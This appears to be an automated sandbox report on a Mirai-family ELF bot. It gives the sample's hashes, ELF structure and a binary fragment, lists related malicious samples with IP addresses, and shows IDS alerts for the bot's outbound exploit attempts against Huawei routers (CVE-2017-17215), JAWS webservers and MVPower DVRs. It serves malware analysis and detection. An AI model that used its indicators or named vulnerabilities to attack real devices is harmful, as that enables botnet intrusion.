                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                41.193.123.12VdNamyEAY2.elfGet hashmaliciousMirai, MoobotBrowse
                  156.32.17.217ircxeF7x13Get hashmaliciousMiraiBrowse
                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                    woofwoof.cfdACKpfvO313.elfGet hashmaliciousMiraiBrowse
                    • 94.156.64.221
                    vh9HOxBJJN.elfGet hashmaliciousMiraiBrowse
                    • 94.156.64.221
                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                    ETISALAT-MISREGACKpfvO313.elfGet hashmaliciousMiraiBrowse
                    • 156.172.243.3
                    vh9HOxBJJN.elfGet hashmaliciousMiraiBrowse
                    • 156.164.65.227
                    A89tA7b84K.elfGet hashmaliciousMiraiBrowse
                    • 156.165.149.228
                    EgucScJumS.elfGet hashmaliciousMiraiBrowse
                    • 105.95.147.88
                    ia54Vyu1GO.elfGet hashmaliciousMiraiBrowse
                    • 41.152.179.63
                    ysEZTOz202.elfGet hashmaliciousMiraiBrowse
                    • 197.123.173.24
                    bot.arm7.elfGet hashmaliciousMirai, MoobotBrowse
                    • 102.56.159.29
                    bot.arm5.elfGet hashmaliciousMirai, MoobotBrowse
                    • 197.121.209.130
                    bot.mpsl.elfGet hashmaliciousMirai, MoobotBrowse
                    • 197.125.42.7
                    bot.arm.elfGet hashmaliciousMirai, MoobotBrowse
                    • 197.193.232.118
                    DOCOMONTTDOCOMOINCJPskt.sh4.elfGet hashmaliciousMiraiBrowse
                    • 183.73.174.226
                    skt.spc.elfGet hashmaliciousMiraiBrowse
                    • 110.163.169.5
                    BsQruPrJVe.elfGet hashmaliciousMirai, Gafgyt, OkiruBrowse
                    • 1.77.255.100
                    bPnq1YMDrf.elfGet hashmaliciousMirai, OkiruBrowse
                    • 157.117.69.117
                    PaRWfF3x5K.elfGet hashmaliciousUnknownBrowse
                    • 27.229.187.214
                    bWT2t63tyx.elfGet hashmaliciousMiraiBrowse
                    • 1.74.39.231
                    BEddZjSb7A.elfGet hashmaliciousUnknownBrowse
                    • 1.79.211.223
                    hgVOQGUGqk.elfGet hashmaliciousUnknownBrowse
                    • 49.99.149.239
                    bot.mips.elfGet hashmaliciousMirai, MoobotBrowse
                    • 157.117.69.108
                    AsrP4dFOgM.elfGet hashmaliciousMirai, MoobotBrowse
                    • 157.117.193.124
                    Vox-TelecomZA6o85zATp5y.elfGet hashmaliciousMiraiBrowse
                    • 155.242.57.30
                    ZKByZWlOxI.elfGet hashmaliciousMiraiBrowse
                    • 196.3.171.87
                    bot.arm7.elfGet hashmaliciousMirai, MoobotBrowse
                    • 197.245.71.192
                    bot.mpsl-20240528-2108.elfGet hashmaliciousMirai, MoobotBrowse
                    • 41.193.123.116
                    arm7.nn.elfGet hashmaliciousMiraiBrowse
                    • 155.240.76.171
                    skt.x86.elfGet hashmaliciousMiraiBrowse
                    • 196.41.11.236
                    dLW2bzO9c1.elfGet hashmaliciousMirai, MoobotBrowse
                    • 41.193.123.118
                    am1NjEcc9b.elfGet hashmaliciousMiraiBrowse
                    • 197.245.71.198
                    2YEUP84vcy.elfGet hashmaliciousMiraiBrowse
                    • 41.193.135.13
                    IQU2qqn8AZ.elfGet hashmaliciousMiraiBrowse
                    • 41.193.135.13
                    TE-ASTE-ASEGACKpfvO313.elfGet hashmaliciousMiraiBrowse
                    • 197.42.235.234
                    vh9HOxBJJN.elfGet hashmaliciousMiraiBrowse
                    • 156.192.115.128
                    xS8bwPQjO2.elfGet hashmaliciousMiraiBrowse
                    • 154.183.195.76
                    EgucScJumS.elfGet hashmaliciousMiraiBrowse
                    • 81.10.127.10
                    ia54Vyu1GO.elfGet hashmaliciousMiraiBrowse
                    • 41.44.233.227
                    ux0nQXF0P6.elfGet hashmaliciousMiraiBrowse
                    • 197.33.36.92
                    6o85zATp5y.elfGet hashmaliciousMiraiBrowse
                    • 154.177.149.195
                    bot.arm7.elfGet hashmaliciousMirai, MoobotBrowse
                    • 197.33.73.24
                    bot.x86.elfGet hashmaliciousMirai, MoobotBrowse
                    • 197.36.101.124
                    No context
                    No context
                    Process:/usr/lib/x86_64-linux-gnu/xfce4/xfconf/xfconfd
                    File Type:XML 1.0 document, ASCII text
                    Category:dropped
                    Size (bytes):5128
                    Entropy (8bit):4.457618060812407
                    Encrypted:false
                    SSDEEP:96:R14GBdYLSNUH+ZAFQrSRR6dn0tWlTDFwIfM/vfzPpjT9I3jZ/qeH2Wg:74GnYLSNUH+ZAyrSRRYn0taTDKIfMPzv
                    MD5:2A2A7C34B585CDAE5E123F3C5100C253
                    SHA1:E814B1B1531B25581DB76CB813C85E53E1390BA4
                    SHA-256:BCA18B654D038B69B25ACDF84CFF99BF521A1B54F482F1DE2B54CE13AC219A04
                    SHA-512:CEC7A3A7A6AD6C2A6D101A3BF6D89A01EBDCEB0121AA3DE1CEA024268410B39E4E9188382439C7C3FD734C66764B66B13F1D277700B00A2FCB35CB67E31996DD
                    Malicious:false
                    Reputation:moderate, very likely benign file
                    Preview:<?xml version="1.0" encoding="UTF-8"?>..<channel name="xfce4-panel" version="1.0">. <property name="configver" type="int" value="2"/>. <property name="panels" type="array">. <value type="int" value="1"/>. <value type="int" value="2"/>. <property name="panel-1" type="empty">. <property name="position" type="string" value="p=6;x=0;y=0"/>. <property name="length" type="uint" value="100"/>. <property name="position-locked" type="bool" value="true"/>. <property name="icon-size" type="uint" value="16"/>. <property name="size" type="uint" value="26"/>. <property name="plugin-ids" type="array">. <value type="int" value="1"/>. <value type="int" value="2"/>. <value type="int" value="3"/>. <value type="int" value="4"/>. <value type="int" value="5"/>. <value type="int" value="6"/>. <value type="int" value="7"/>. <value type="int" value="8"/>. <value type="int" value="9"/>. <value type="in
                    File type:ELF 32-bit LSB executable, Renesas SH, version 1 (SYSV), statically linked, stripped
                    Entropy (8bit):6.683071633163858
                    TrID:
                    • ELF Executable and Linkable format (generic) (4004/1) 100.00%
                    File name:t9lNEiD3ui.elf
                    File size:74'356 bytes
                    MD5:0a305a485936ad7b125fd7c290a0eb96
                    SHA1:c7e3cf74d777ab0f245e2490623cae64daf8b8cd
                    SHA256:3a8d62d46b4085e40a80a7595995da009984db3e75096580d4f3008d0a588272
                    SHA512:c8ac2fa6e02b065399366264c64bbbf58d5825753d48c5bec1e744ddf8044be3eec633164e78121bd7cc7e22a7a30e0e9dc18a354029fb748cb3d556275f8a7b
                    SSDEEP:1536:N/OLrHkwdPBGD2YhuZW67BecaGN18vAKHzQHsahZc9:N/O/EwOgWJE1EalZ
                    TLSH:21738D32E0146CE2C62019B6B6EDDD7C0343BD6154626CB16E8DABD84D6BEECB08DB50
                    File Content Preview:.ELF..............*.......@.4.... ......4. ...(...............@...@.....................t ..t B.t B.0...t...........Q.td..............................././"O.n......#.*@........#.*@....&O.n.l..................................././.../.a"O.!...n...a.b("...q.

                    ELF header

                    Class:ELF32
                    Data:2's complement, little endian
                    Version:1 (current)
                    Machine:<unknown>
                    Version Number:0x1
                    Type:EXEC (Executable file)
                    OS/ABI:UNIX - System V
                    ABI Version:0
                    Entry Point Address:0x4001a0
                    Flags:0xc
                    ELF Header Size:52
                    Program Header Offset:52
                    Program Header Size:32
                    Number of Program Headers:3
                    Section Header Offset:73956
                    Section Header Size:40
                    Number of Section Headers:10
                    Header String Table Index:9
                    NameTypeAddressOffsetSizeEntSizeFlagsFlags DescriptionLinkInfoAlign
                    NULL0x00x00x00x00x0000
                    .initPROGBITS0x4000940x940x2e0x00x6AX004
                    .textPROGBITS0x4000e00xe00x104e00x00x6AX0032
                    .finiPROGBITS0x4105c00x105c00x220x00x6AX004
                    .rodataPROGBITS0x4105e40x105e40x13cc0x00x2A004
                    .ctorsPROGBITS0x4220740x120740x80x00x3WA004
                    .dtorsPROGBITS0x42207c0x1207c0x80x00x3WA004
                    .dataPROGBITS0x4220880x120880x1c0x00x3WA004
                    .bssNOBITS0x4220a40x120a40x9440x00x3WA004
                    .shstrtabSTRTAB0x00x120a40x3e0x00x0001
                    TypeOffsetVirtual AddressPhysical AddressFile SizeMemory SizeEntropyFlagsFlags DescriptionAlignProg InterpreterSection Mappings
                    LOAD0x00x4000000x4000000x119b00x119b06.78930x5R E0x10000.init .text .fini .rodata
                    LOAD0x120740x4220740x4220740x300x9742.28830x6RW 0x10000.ctors .dtors .data .bss
                    GNU_STACK0x00x00x00x00x00.00000x7RWE0x4
                    TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                    06/01/24-18:15:54.251831TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3577037215192.168.2.23197.81.225.105
                    06/01/24-18:15:55.261460TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4200037215192.168.2.2341.32.165.26
                    06/01/24-18:15:55.265326TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5723680192.168.2.23157.210.196.213
                    06/01/24-18:15:55.268249TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5098480192.168.2.23191.125.210.105
                    06/01/24-18:15:56.307074TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5885037215192.168.2.23197.35.163.130
                    06/01/24-18:15:53.241651TCP2025883ET EXPLOIT MVPower DVR Shell UCE4055480192.168.2.2360.55.180.73
                    06/01/24-18:15:56.307832TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4663637215192.168.2.23197.46.217.40
                    06/01/24-18:15:54.252468TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4559437215192.168.2.23156.9.236.107
                    06/01/24-18:15:53.240541TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5453680192.168.2.23197.114.181.205
                    06/01/24-18:15:55.260401TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4374037215192.168.2.23197.163.157.253
                    06/01/24-18:15:53.237757TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3762480192.168.2.2342.244.32.219
                    06/01/24-18:15:55.259281TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4449437215192.168.2.23156.41.49.187
                    06/01/24-18:15:55.264884TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4832280192.168.2.23191.89.47.231
                    06/01/24-18:15:54.253854TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4203037215192.168.2.23197.154.217.12
                    06/01/24-18:15:55.268202TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4068280192.168.2.23120.172.16.124
                    06/01/24-18:15:53.239333TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5098080192.168.2.23212.199.183.185
                    06/01/24-18:15:55.263107TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5230437215192.168.2.2341.136.68.81
                    06/01/24-18:15:53.238879TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4255480192.168.2.2368.39.123.219
                    06/01/24-18:15:54.254927TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4671037215192.168.2.23197.109.223.59
                    06/01/24-18:15:55.259084TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3411637215192.168.2.23197.227.44.103
                    06/01/24-18:15:54.251475TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5605037215192.168.2.23156.198.133.179
                    06/01/24-18:15:54.238118TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution6081080192.168.2.2399.170.206.200
                    06/01/24-18:15:54.273912TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3531037215192.168.2.23156.55.54.27
                    06/01/24-18:15:55.259125TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5325637215192.168.2.23156.182.240.81
                    06/01/24-18:15:56.308094TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3630237215192.168.2.23156.166.201.246
                    06/01/24-18:15:54.252286TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5236237215192.168.2.23156.45.224.43
                    06/01/24-18:15:54.254181TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4408637215192.168.2.2341.139.184.97
                    06/01/24-18:15:56.307255TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3572437215192.168.2.23156.177.93.194
                    06/01/24-18:15:55.268096TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4584880192.168.2.23148.228.134.26
                    06/01/24-18:15:54.251747TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4038037215192.168.2.2341.29.240.127
                    06/01/24-18:15:53.237729TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5338480192.168.2.23115.206.192.214
                    06/01/24-18:15:54.251062TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4865837215192.168.2.2341.164.227.208
                    06/01/24-18:15:54.256517TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5530237215192.168.2.23197.177.223.221
                    06/01/24-18:15:55.266093TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4203280192.168.2.23172.152.35.55
                    06/01/24-18:15:53.247100TCP2025883ET EXPLOIT MVPower DVR Shell UCE5436680192.168.2.2348.52.58.128
                    06/01/24-18:15:54.238864TCP2025883ET EXPLOIT MVPower DVR Shell UCE4045680192.168.2.23132.66.64.38
                    06/01/24-18:15:54.256904TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5843437215192.168.2.23197.24.244.117
                    06/01/24-18:15:55.265423TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5503680192.168.2.2342.75.164.254
                    06/01/24-18:15:54.252388TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5319637215192.168.2.23156.58.214.28
                    06/01/24-18:15:56.305803TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5017237215192.168.2.23197.78.23.227
                    06/01/24-18:15:54.237601TCP2025883ET EXPLOIT MVPower DVR Shell UCE4457480192.168.2.23168.235.31.17
                    06/01/24-18:15:54.273782TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4614837215192.168.2.23197.69.9.82
                    06/01/24-18:15:55.261704TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5926837215192.168.2.23197.115.193.139
                    06/01/24-18:15:53.238079TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4383280192.168.2.2334.240.253.41
                    06/01/24-18:15:54.238523TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5802680192.168.2.2359.172.71.185
                    06/01/24-18:15:56.254680TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3471680192.168.2.2347.229.128.11
                    06/01/24-18:15:56.308237TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4530237215192.168.2.2341.114.72.170
                    06/01/24-18:15:54.239606TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4802680192.168.2.23124.204.6.25
                    06/01/24-18:15:54.252809TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5380637215192.168.2.23197.239.209.224
                    06/01/24-18:15:54.256311TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3297437215192.168.2.2341.13.222.141
                    06/01/24-18:15:55.260737TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5322637215192.168.2.23197.146.75.139
                    06/01/24-18:15:54.274230TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5514837215192.168.2.23156.122.9.247
                    06/01/24-18:15:54.273711TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3736237215192.168.2.23156.48.71.40
                    06/01/24-18:15:56.287347TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4784480192.168.2.23129.88.154.122
                    06/01/24-18:15:56.308066TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5703637215192.168.2.2341.97.81.103
                    06/01/24-18:15:53.240367TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3370680192.168.2.23187.205.139.84
                    06/01/24-18:15:54.239670TCP2025883ET EXPLOIT MVPower DVR Shell UCE5480880192.168.2.23118.249.69.78
                    06/01/24-18:15:55.259918TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6076037215192.168.2.2341.102.253.127
                    06/01/24-18:15:54.253083TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5514437215192.168.2.2341.61.6.231
                    06/01/24-18:15:56.245293TCP2025883ET EXPLOIT MVPower DVR Shell UCE5055680192.168.2.23159.201.245.13
                    06/01/24-18:15:55.265307TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4364680192.168.2.23105.69.202.220
                    06/01/24-18:15:53.241837TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5717480192.168.2.2337.47.52.166
                    06/01/24-18:15:54.240510TCP2025883ET EXPLOIT MVPower DVR Shell UCE4174680192.168.2.2380.152.111.154
                    06/01/24-18:15:56.306008TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4710837215192.168.2.2341.12.155.54
                    06/01/24-18:15:56.246748TCP2025883ET EXPLOIT MVPower DVR Shell UCE3795480192.168.2.23183.59.59.222
                    06/01/24-18:15:54.251427TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4071437215192.168.2.23197.215.123.203
                    06/01/24-18:15:56.306077TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3474237215192.168.2.2341.127.231.35
                    06/01/24-18:15:54.274356TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4688237215192.168.2.23197.249.199.20
                    06/01/24-18:15:54.275211TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3291037215192.168.2.23197.236.18.225
                    06/01/24-18:15:56.307179TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3702237215192.168.2.23197.84.49.239
                    06/01/24-18:15:56.246473TCP2025883ET EXPLOIT MVPower DVR Shell UCE5095680192.168.2.2372.8.191.18
                    06/01/24-18:15:56.287840TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5483237215192.168.2.23197.91.191.231
                    06/01/24-18:15:54.251612TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3883637215192.168.2.23156.141.233.124
                    06/01/24-18:15:55.261368TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4513837215192.168.2.23156.193.29.187
                    06/01/24-18:15:54.252324TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4158637215192.168.2.23197.22.210.222
                    06/01/24-18:15:55.262106TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3867237215192.168.2.2341.144.238.83
                    06/01/24-18:15:55.266817TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5567480192.168.2.23138.31.177.46
                    06/01/24-18:15:55.265106TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3635080192.168.2.2350.74.213.181
                    06/01/24-18:15:55.267923TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5578880192.168.2.23112.160.11.208
                    06/01/24-18:15:56.247051TCP2025883ET EXPLOIT MVPower DVR Shell UCE5350080192.168.2.2352.63.251.95
                    06/01/24-18:15:56.287981TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3977237215192.168.2.2341.209.117.218
                    06/01/24-18:15:56.305877TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3492437215192.168.2.2341.219.48.227
                    06/01/24-18:15:56.246697TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5551680192.168.2.2327.184.243.158
                    06/01/24-18:15:54.251906TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3327237215192.168.2.2341.104.188.254
                    06/01/24-18:15:56.254966TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5851280192.168.2.23188.86.168.160
                    06/01/24-18:15:54.275510TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3877237215192.168.2.23197.231.220.22
                    06/01/24-18:15:54.256278TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3759037215192.168.2.23197.1.219.71
                    06/01/24-18:15:55.267289TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3606880192.168.2.2343.160.124.104
                    06/01/24-18:15:56.246777TCP2025883ET EXPLOIT MVPower DVR Shell UCE4238880192.168.2.2358.54.35.204
                    06/01/24-18:15:54.273650TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3925037215192.168.2.2341.136.53.187
                    06/01/24-18:15:54.254035TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5001837215192.168.2.23197.215.229.110
                    06/01/24-18:15:53.240199TCP2025883ET EXPLOIT MVPower DVR Shell UCE3788680192.168.2.23154.1.74.103
                    06/01/24-18:15:54.253703TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3798037215192.168.2.23197.18.253.163
                    06/01/24-18:15:56.224465TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5884280192.168.2.2381.92.36.148
                    06/01/24-18:15:54.252700TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4771637215192.168.2.23197.148.143.218
                    06/01/24-18:15:56.245977TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3986680192.168.2.23119.181.107.102
                    06/01/24-18:15:56.244628TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5331680192.168.2.23188.170.231.160
                    06/01/24-18:15:55.267325TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4991680192.168.2.23104.145.249.34
                    06/01/24-18:15:53.238957TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5807080192.168.2.23186.28.217.117
                    06/01/24-18:15:55.259243TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3412637215192.168.2.23197.16.225.51
                    06/01/24-18:15:53.239313TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5281280192.168.2.2341.59.82.228
                    06/01/24-18:15:53.247342TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3644280192.168.2.2377.156.147.3
                    06/01/24-18:15:56.306634TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3601437215192.168.2.23156.35.92.138
                    06/01/24-18:15:56.305747TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3373037215192.168.2.23156.168.190.123
                    06/01/24-18:15:55.261842TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5937437215192.168.2.23197.244.184.156
                    06/01/24-18:15:55.267862TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4837680192.168.2.23156.11.139.204
                    06/01/24-18:15:56.254180TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4515480192.168.2.232.239.207.135
                    06/01/24-18:15:56.246301TCP2025883ET EXPLOIT MVPower DVR Shell UCE4869880192.168.2.2342.99.218.12
                    06/01/24-18:15:54.238269TCP2025883ET EXPLOIT MVPower DVR Shell UCE4616480192.168.2.2381.66.87.121
                    06/01/24-18:15:54.238913TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3319480192.168.2.23222.37.4.5
                    06/01/24-18:15:55.266068TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4165880192.168.2.23128.197.243.4
                    06/01/24-18:15:56.246060TCP2025883ET EXPLOIT MVPower DVR Shell UCE3545280192.168.2.2387.238.251.102
                    06/01/24-18:15:54.238074TCP2025883ET EXPLOIT MVPower DVR Shell UCE5598280192.168.2.23124.0.139.31
                    06/01/24-18:15:55.272711TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution6043880192.168.2.232.243.242.44
                    06/01/24-18:15:54.274132TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3892637215192.168.2.23156.11.214.49
                    06/01/24-18:15:55.260018TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3553837215192.168.2.23197.48.200.253
                    06/01/24-18:15:54.255877TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4413037215192.168.2.23156.151.10.77
                    06/01/24-18:15:54.239397TCP2025883ET EXPLOIT MVPower DVR Shell UCE4821280192.168.2.2385.238.207.251
                    06/01/24-18:15:55.261023TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5754037215192.168.2.23156.172.199.73
                    06/01/24-18:15:55.268272TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5316480192.168.2.2352.152.172.237
                    06/01/24-18:15:54.275631TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5905837215192.168.2.23156.4.146.242
                    06/01/24-18:15:55.263159TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4283437215192.168.2.23156.27.95.98
                    06/01/24-18:15:56.287929TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3672837215192.168.2.2341.121.144.224
                    06/01/24-18:15:54.275319TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4092037215192.168.2.23197.235.211.74
                    06/01/24-18:15:56.307148TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3704837215192.168.2.23197.208.62.80
                    06/01/24-18:15:54.239470TCP2025883ET EXPLOIT MVPower DVR Shell UCE4769480192.168.2.23134.80.188.68
                    06/01/24-18:15:55.262015TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3441037215192.168.2.23197.138.203.250
                    06/01/24-18:15:54.239158TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4861480192.168.2.23179.122.233.207
                    06/01/24-18:15:54.239895TCP2025883ET EXPLOIT MVPower DVR Shell UCE3822680192.168.2.23156.33.185.72
                    06/01/24-18:15:56.308392TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6020437215192.168.2.23197.159.189.243
                    06/01/24-18:15:54.239435TCP2025883ET EXPLOIT MVPower DVR Shell UCE4437880192.168.2.2332.62.55.43
                    06/01/24-18:15:54.240636TCP2025883ET EXPLOIT MVPower DVR Shell UCE3925880192.168.2.23108.12.66.222
                    06/01/24-18:15:54.255917TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5408637215192.168.2.23156.123.221.185
                    06/01/24-18:15:56.308318TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4582437215192.168.2.23156.126.49.34
                    06/01/24-18:15:55.266407TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4042880192.168.2.23161.254.82.15
                    06/01/24-18:15:54.239735TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4957080192.168.2.2342.187.49.118
                    06/01/24-18:15:54.287413TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6089237215192.168.2.2341.54.77.148
                    06/01/24-18:15:56.306669TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5208837215192.168.2.2341.174.41.196
                    06/01/24-18:15:54.240104TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4268280192.168.2.2313.15.216.154
                    06/01/24-18:15:55.267200TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4119680192.168.2.2354.66.237.186
                    06/01/24-18:15:54.240252TCP2025883ET EXPLOIT MVPower DVR Shell UCE5094080192.168.2.2376.115.82.134
                    06/01/24-18:15:54.239857TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4307280192.168.2.23107.118.12.96
                    06/01/24-18:15:54.238762TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3514080192.168.2.2324.72.9.82
                    06/01/24-18:15:54.252020TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5128837215192.168.2.23156.122.101.93
                    06/01/24-18:15:54.255667TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5714237215192.168.2.2341.39.148.206
                    06/01/24-18:15:54.254890TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6060837215192.168.2.2341.55.10.217
